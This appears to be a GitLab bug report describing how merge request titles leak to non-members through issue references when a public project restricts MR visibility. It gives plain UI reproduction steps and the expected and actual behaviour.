Information leakage with references to MRs where project is public, but MRs are private
The title of an MR can be leaked if referenced, even if the project to which the MR belongs to restricts access to MRs.
Discovered on GitLab.com
Steps to reproduce
- Create a public project.
- Modify project settings so the "Feature Visibility" setting for either "Repository" or "Merge requests" is set to "Only Team Members".
- Create a new merge request in the project (will need to push two divergent branches before hand). In theory, this MR should only be visible to team members.
- Create an issue that references this MR.
- In a private/incognito browsing window, view the newly created issue.
The MR reference should not be a link (to a non-project-member user), and the MR title should not be shown in the "Related Merge Requests" section.
The MR reference is a link (that leads to 404), and the MR title is included in the "Related Merge Requests" section.
Relevant logs and/or screenshots
I did not check to see if the same info leakage exists for issues (i.e. if issue references leak titles when access to issues are restricted), but it might very well be the case that issue titles can also be leaked in the same manner.